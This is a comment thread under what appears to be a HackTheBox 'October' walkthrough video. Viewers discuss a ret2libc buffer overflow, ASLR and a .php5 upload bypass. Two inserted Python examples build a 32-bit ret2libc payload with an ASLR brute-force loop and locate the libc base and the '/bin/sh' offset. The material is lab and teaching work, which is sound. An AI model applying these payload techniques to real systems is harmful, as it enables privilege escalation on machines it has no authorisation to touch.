Absolute animal, I always get excited watching your videos. Much appreciated.
Hey, just wanted to say thanks for making these videos. They're super helpful for getting a nice understanding of the general steps in hacking. Plus, they're quite entertaining too. Keep it up!
I really do admire how you walk through the box as if it's your first time, showing typical things that you know may be tried and explaining WHY they didn't work. It's hard to teach this stuff, but your videos really do help with knowing what to look for and becoming more observant when performing system reconnaissance. Great job as always... please keep it up :) !
I would love to see more videos on buffer overflows. Great video as always, thanks!
Great buffer overflow example
Pretty sure this one was hard for those who have never worked on Buffer Overflows. Luckily I covered the basics before going into this video. You can also update the description at 21:15 as it says "Pattner_create". Loved this video.
Thank you @ippSec. I pwned frolic using the method you show here. This was my first ROP :D Didn't think it'd be so easy!
I would like to thank you for making such awesome videos. I really appreciate your hard work and time you dedicate. Hats off to you sir.
Awesome video, after that I was able to write my first buffer_ovrflw and got root on Frolic with the first shot
I clapped when you got root! I’ve done a small bit of malware analysis and got to learn about the CPU, Memory and assembly, but all without ASLR or DEP. I didn’t quite understand what you were doing with the system and offsets but going to do some more research tonight. Cheers!
Awesome video. It's so helpful to have a practical example to go with the theory.
Your videos are really awesome. I have learned a lot from them. Thanks :)
I really enjoy your videos. Thank you for the RE 101. It really helped!
1:38 This is the first time I've seen phtml.
As for the rest of your video, this is *way* over my head.
😂😂😂sameeee
I know this is old, but you can avoid the buffer overflow part and use pkexec privilege escalation instead
I wonder why at 28:02 the system address was off, but at 31:44 it was right? Was it because he ran 'p system' in ./ovrflw and that changed it?
I love your videos man! Keep going, as many bof machines as possible please :)
Did you ever finish the OSCE? Also was the SANs SEC660 good class to take?
Yes to both.
Raymond from Everybody Loves Raymond is the best teacher. :) Thumbs up!
AMAZING VIDEO!!!!!!
LEARN A LOT HOW TO BUFFER OVERFLOW ON LINUX
I have a question even though it seems stupid lol.
If you had set an environment variable with shellcode and looked at the stack to find its location, and then used it to activate the shell, would it have worked?
holy crap, now I am able to understand this shit!!! thanks ippsec
I did not play the box and do not know how much code the binary contains, but to avoid brute-forcing the libc address I would have examined the binary to see whether it has all the necessary gadgets for a ROP chain.
Followed from Bitterman, this is great stuff
Thank you for these videos! I was wondering why you couldn't use tmux to spawn an interactive shell?
I think you can, and I misspoke. Just one of those things I avoid because doing it this way screws up how keyboard hotkeys work for that window and I don't want it to mess with my other tmux windows.
So I play it safe and keep the window I screw with isolated, that way I can just close it when I'm done.
Good stuff. One thing I'd do differently is use diff recursively instead of md5ing stuff. Shows the exact difference between files when they differ by default, but can also be turned off, along with excluding files.
Check out pwndbg for gdb too - peda works, but hasn't been active for years.
Seems you found out in bitterman how to create a pattern from inside of gdb peda, maybe that's worth mentioning here so that people don't go look for the one from msf :)
Thanks ippsec. This video taught me a LOT. With this video I could get root on Frolic!!! :-)
Thank you for the video. At 9:50 I get an error, failed to daemonize, do I need to enable port forwarding? I am a noob, thanks
The hunt to root october
Great example and walk through!
Hi IppSec,
After watching this week's box I came back to October for the BO, I just have a question. At 32:51 you can see the full exploit that actually pops up the /bin/sh.
However, at 43:30 the buffer is different.
Your buffer at 32:51 would be (112 A's + System_addr + exit_addr + arg_addr)
Your buffer at 43:30 would be (112 A's + libc_base_addr + System_addr + libc_base_addr + exit_addr + libc_base_addr + arg_addr)
My educated guess is, because every time you run System_addr or exit_addr it needs to go to libc_base_addr in order to run the next instruction?
I know it's an old comment, but will reply anyway. What he does is add offsets to the base address number, so System_addr = libc_base_addr + system_off. While System_addr and libc_base_addr are addresses, system_off is not; it tells you something like "how far after the beginning of the libc base address the system address is", so in order to calculate System_addr you need to add that offset number to the base address the same way as you add decimal numbers (1 + 1 = 2), and you end up with an address like 0xd3adc0d3 (still 4 bytes, not 8).

Later, after he converts them to little endian, he adds them to the buffer, but Python knows that the left operand (buff) is a string, so it treats the right ones, System_addr etc., like characters and appends them to the buff string (you can see them when he tests out the script on October before editing it and prints out the buff).
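As an added worked example (this is not IppSec's script and not code shown in the video), here is the arithmetic the reply above describes, written out in Python: each libc address is base + offset, each is packed little-endian as a 4-byte word, and only three words follow the 112 bytes of padding. The padding length comes from the thread; the libc base and the three offsets are assumed placeholder values, not October's real ones. Also included is the retry loop an exploit like this needs when ASLR moves libc on every run, with a constructed stand-in for the target so the whole thing runs offline.

```python
import random
import struct

# Padding to the saved return address, as stated in the thread.
PAD = 112

# ASSUMED placeholder values for illustration only, not October's real numbers.
# On a real target the offsets come from the victim's libc (e.g. `readelf -s`, or
# `p system` in gdb minus the base) and the base from /proc/<pid>/maps.
LIBC_BASE = 0xB7E2C000      # one guess for where libc is loaded
SYSTEM_OFF = 0x0003ADA0     # offset of system() inside libc
EXIT_OFF = 0x0002E9D0       # offset of exit() inside libc
BINSH_OFF = 0x0015BA0B      # offset of the "/bin/sh" string inside libc


def p32(value: int) -> bytes:
    """Pack a 32-bit address little-endian, the byte order a 32-bit x86 stack uses."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def resolve(libc_base: int, offsets: dict) -> dict:
    """Absolute address = base + offset, computed once per guess of the base."""
    return {name: libc_base + off for name, off in offsets.items()}


def build_payload(libc_base: int, pad: int = PAD) -> bytes:
    """32-bit ret2libc layout after the padding:

        system() | exit() (what system() returns into) | &"/bin/sh" (system()'s argument)

    Only three addresses follow the padding: the base is folded into each of them,
    it is never placed on the stack as a separate word.
    """
    addrs = resolve(libc_base, {"system": SYSTEM_OFF, "exit": EXIT_OFF, "binsh": BINSH_OFF})
    return b"A" * pad + p32(addrs["system"]) + p32(addrs["exit"]) + p32(addrs["binsh"])


def brute_force(run_attempt, guessed_base: int, max_tries: int = 1000) -> int:
    """Under 32-bit ASLR libc can only land in a small number of places, so the same
    payload (built for one guessed base) is resent until the guess happens to be
    right.  run_attempt(payload) returns True when a shell came back.  Returns the
    attempt number that succeeded, or -1 after max_tries."""
    payload = build_payload(guessed_base)
    i = 0
    while i < max_tries:
        i += 1                         # i += i would stay at 0 forever
        if run_attempt(payload):
            return i
    return -1


def make_simulated_target(seed: int, bases=(0xB7E2A000, 0xB7E2B000, 0xB7E2C000, 0xB7E2D000)):
    """Stand-in for the real binary (constructed for this example): every run picks
    a fresh libc base from a tiny set, modelling ASLR, and 'pops a shell' only if
    the payload was built for the base that was actually chosen."""
    rng = random.Random(seed)

    def run_attempt(payload: bytes) -> bool:
        actual_base = rng.choice(bases)
        return payload == build_payload(actual_base)

    return run_attempt


if __name__ == "__main__":
    payload = build_payload(LIBC_BASE)
    print(len(payload), payload[PAD:].hex())
    print("shell after", brute_force(make_simulated_target(7), LIBC_BASE), "attempts")
```

The point of `brute_force` is that nothing about the payload changes between attempts: the exploit does not search for libc, it waits for the kernel to load libc where the guess says it is. A wrong guess normally just crashes the target, which is why this only works against something that restarts or can be re-run at will.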
at around 15:00 minutes you switched to an Ubuntu VM to run gdb and see where the program crashes... why did you switch machines rather than just use Kali? thanks for the vids man, really helping me learn a lot!
Because he tried to replicate the victim machine's state (version, distro, architecture) as closely as possible to be able to do the buffer overflow
this gave me anxiety
lol thanks!
I have one doubt, but it's not related to this video.
If you see the submissions list on the HTB website,
Egotistical submitted one easy box; he only tested it and rejected it.
I didn't understand; could you tell me if you know?
He only submitted and he only rejected it
Hey, at circa 6:30 in, I'm not sure why you excluded the php files? Surely you were looking for changes in the source code, and the php files are the source code in this instance? So you may have missed a "2 md5sum ./filename.php" ?
PHP files serve dynamic content, performing a md5sum against the physical file and one retrieved from the web server would produce different results.
Yeah I get that, but you were comparing the php files downloaded from two different versions of the source code? I'm probably missing something (like "the point"). It's minor in the grand scheme... I'm still working through this video and it's awesome. Have watched it through once, and now following step by step on the retired machine. Thank you for all your time and effort :-)
Awesome walkthrough, thank you. I'm hoping this will help prepare me for calamity, but I think there is still a lot to learn!
The portion of the video you’re referring to is me trying to identify what version of software the web server is running. If you know the version is X revisions behind you can look at all the change logs to see if they fixed any security issues. I don’t believe I ever use the php files, I exclude them
IppSec got it, makes sense, thanks. You da man!
Amazing stuff
hi ippsec do you still have the ovrflw binary? can i have it :)
Why does/would libc.so have the address location for /bin/sh in it?
Trying to understand the thought process there.
Been forever since I did the video, but libc contains the string /bin/sh. That string will exist in a ton of places as it's pretty common; however, the majority of the memory space is unknown to us. We know libc's structure, so we make educated guesses as to where libc is; if we are correct we can piece together everything else using the one known as a pivot point... Watch my Bitterman video, it should be a big help.
@@ippsec I watched Bitterman and that was another great look at BOF. THANK YOU! So /bin/sh can be found in glibc because glibc is the back end for most core Linux functionality? So could I find just about every /bin/* or /sbin/* program in glibc?
@IppSec how to fix this "/bin/bash: warning: command substitution: ignored null byte in input'
Hi IppSec,
I really wanted to thank you for all these videos, so much knowledge inside, keep it up!
Just a small question please ; at 25:35, I just can't understand the content (arranged in columns and lines) of the stack display area in PEDA / gdb... I don't understand, I see stack addresses (data in blue) with chaining arrow, etc... If someone could quickly explain this to me, that would be great! Thanks again
Top is the memory registers.
Middle is the disassembled code, the arrow is what instruction the program is on
Bottom is the stack.
Thanks for your help IppSec!
I've already understood that. In fact I was talking only about the bottom area representing the stack. There are some arrows between stack addresses, represented like this -->, and I don't get what they mean...
@@jonathanvincent5812 don't know for sure, but my guess is one arrow is the stack pointer, i.e. the current "top" of the stack and the other is the base pointer, i.e. the reference pointer to which local vars and function args are accessed relative to
awesome!
Sir, but the retired machine is not accessible, how do I practice? Sir, please help me
When getting the initial shell i immediately got root. no priv esc needed for me. which was odd...
Does anyone have problems with vi on October? It's difficult to write a script when I can't do vim ~/.vimrc -> no compatible
Just your increment was wrong... i+=i should've been i+=1
I was like..dude it's 1..
1..
then he ran the script.. It worked though!!
It doesn't make sense, make a video explaining how to write a buffer overflow
And why did you have to hack the ovrflw file in order to get a shell? I know you explained the changing address thing, but why do you need to crack the file ovrflw?
Oh wait, it's to get root access, right?
nice video, thanks
October blocks me from uploading any .php files using the media button even with the Admin admin account logged in. NVM, I later noticed you changed the ext to .php5; didn't know you could do that to a php ext and it would still work
Why can't Ipp spawn a pty shell in a tmux session at ~18:30
Misspoke. I can, I was just worried doing the stty raw could have affected other panes
💗🧜♀️🧚♀️ 💗
Why does he say that he can't run the python Pty shell code on Tmux?
I'm not exactly sure, but keep in mind how old this video is. It's probably just because I didn't know to set the ROWS/COLUMNS.
@@ippsec ohhh hahah thanks!
lol i += i ??
incrementation fault :V
We never got to see whether you could exit the application after getting the flag :o
Guess you’ll have to do the box yourself :)
hello ippsec
I need your help to understand Linux buffer overflows. I actually can do exe overflows with Immunity Debugger, but everything goes to crap when trying Linux overflows.
In this video you followed different pointers to exploit. But what is the difference between this box and Sneaky? (ua-cam.com/video/1UGxjqTnuyo/v-deo.html). Sneaky is a "classic" overflow and I can do it too. What makes October so complicated? ASLR? Why didn't you just use packetstorm shellcode instead of getting libc addresses?
I found some sources about Linux stack overflows but still got nothing. Would you like to share some good sources with us? And everyone on your channel wants a buffer overflow video. Do you mind recording it? For.. your.. servants?
Sorry for bad English -- I'm not a native speaker. Maybe it's the reason I can't find a good source for BOFs.
thank you
ldd ovrflw | grep libc wasn't returning the correct libc offset for the exploit to work in my "ASLR off" environment.
From googling, the command ```LD_TRACE_LOADED_OBJECTS=1 /root/Desktop/hackthebox/October/bof/ovrflw | grep libc``` solved my problem,
BUT I need root to run LD_TRACE_LOADED_OBJECTS=1 (it looks like); any alternative commands?
Ended up opening it in GDB and looking at proc maps.
Odd, what distro of Linux are you on? Also 32 or 64 bit?
IppSec, I was on Kali Linux 64 with ASLR off; the exploit worked after getting the glibc offset from proc maps instead of with ldd. As far as I read (after having this issue) ldd is not precise; let me know if you know a better way to get the glibc offset.
Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
btw thanks for the video, learned a lot!
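Two questions in this thread, why "/bin/sh" has an address inside libc at all and how to get the libc base from the running process's /proc/<pid>/maps rather than from ldd, come down to the same arithmetic: address = base + offset. The base changes per run (under ASLR) while the offsets are fixed by the libc build. This added example, which is not from the video, parses a constructed maps excerpt for the libc base, and searches a libc image for the NUL-terminated "/bin/sh" string to get its offset. The maps text, its addresses, inodes and the binary path are invented for the example; the live check at the bottom only runs on a Linux host with /proc. One caveat on the string offset: the file offset that `strings -t x` reports equals the libc-relative virtual offset only when the segment holding the string is mapped at an offset equal to its virtual address (true for glibc's text/rodata in practice; `readelf -l` shows the segment table if in doubt).

```python
import ctypes
import os
import re

# Constructed excerpt of /proc/<pid>/maps for a 32-bit process.  Addresses,
# inodes and the binary path are invented for this example.
SAMPLE_MAPS = """\
08048000-08049000 r-xp 00000000 08:01 262212 /home/user/ovrflw
08049000-0804a000 r--p 00000000 08:01 262212 /home/user/ovrflw
f7dc5000-f7dc6000 rw-p 00000000 00:00 0
f7dc6000-f7f6d000 r-xp 00000000 08:01 393386 /lib/i386-linux-gnu/libc-2.19.so
f7f6d000-f7f6f000 r--p 001a7000 08:01 393386 /lib/i386-linux-gnu/libc-2.19.so
f7f6f000-f7f70000 rw-p 001a9000 08:01 393386 /lib/i386-linux-gnu/libc-2.19.so
f7f99000-f7f9b000 r--p 00000000 00:00 0 [vvar]
fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack]
"""

# start-end perms file_offset dev inode [path]
MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+\S+\s+\d+\s*(.*)$"
)
# Matches libc.so.6 and libc-2.19.so but not libcrypto.so
LIBC_NAME = re.compile(r"/libc(-[\d.]+)?\.so(\.\d+)?$")


def parse_maps(text: str):
    """Yield (start, end, perms, file_offset, path) for every mapping line."""
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if m:
            yield (int(m.group(1), 16), int(m.group(2), 16),
                   m.group(3), int(m.group(4), 16), m.group(5))


def libc_mappings(text: str):
    return [m for m in parse_maps(text) if LIBC_NAME.search(m[4])]


def libc_base(text: str):
    """The libc base is the lowest mapping of the libc file that starts at file
    offset 0.  Taking the lowest start (rather than 'the r-xp line') keeps this
    right on newer glibc builds where the first libc segment is read-only."""
    starts = [start for start, _end, _perms, off, _path in libc_mappings(text) if off == 0]
    return min(starts) if starts else None


def libc_path(text: str):
    mappings = libc_mappings(text)
    return mappings[0][4] if mappings else None


def find_binsh_offset(libc_image: bytes):
    """Offset of the NUL-terminated "/bin/sh" string inside a libc image (the same
    number `strings -a -t x libc.so.6 | grep /bin/sh` prints).  None if absent."""
    idx = libc_image.find(b"/bin/sh\x00")
    return None if idx < 0 else idx


if __name__ == "__main__":
    print("sample base:", hex(libc_base(SAMPLE_MAPS)), libc_path(SAMPLE_MAPS))
    # Live check on Linux: base from this process's own maps, system() via ctypes,
    # so system() - base is the offset that stays constant while the base moves.
    if os.path.exists("/proc/self/maps"):
        with open("/proc/self/maps") as fh:
            maps = fh.read()
        base, path = libc_base(maps), libc_path(maps)
        if base and path:
            system = ctypes.cast(ctypes.CDLL(path).system, ctypes.c_void_p).value
            with open(path, "rb") as fh:
                binsh = find_binsh_offset(fh.read())
            print("live base:", hex(base), "system offset:", hex(system - base),
                  "/bin/sh offset:", hex(binsh) if binsh is not None else None)
```

Running the live part several times shows the base moving between runs (with ASLR on) while the two offsets never change, which is exactly what makes "guess the base, keep the offsets" a workable strategy; with ASLR off the base printed here is the one the exploit should use.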
How are you able to have so smooth vms?
Probably the open-vm-tools package?
Really liked your video. Can you give some tutorial links or make some videos on the basics of exploiting.
Thanks for the comment. Cybrary may have what you are looking for. As far as me doing videos on "How to Hack", I don't have plans for that. It's a huge time commitment to do for free -- and honestly I don't really want my material to come up when you google "How to Hack".
I understand it may sound odd as these CTF Write-Ups do show exploits but I believe the demographic that searches for CTF Write-Ups is more favored on the legitimate side of things.
Hi mate, you may be interested in the "Hacking: The Art of Exploitation" book. Link: nostarch.com/hacking2.htm
Bro, you are a genius, teach me your way
Interesting... :)
so good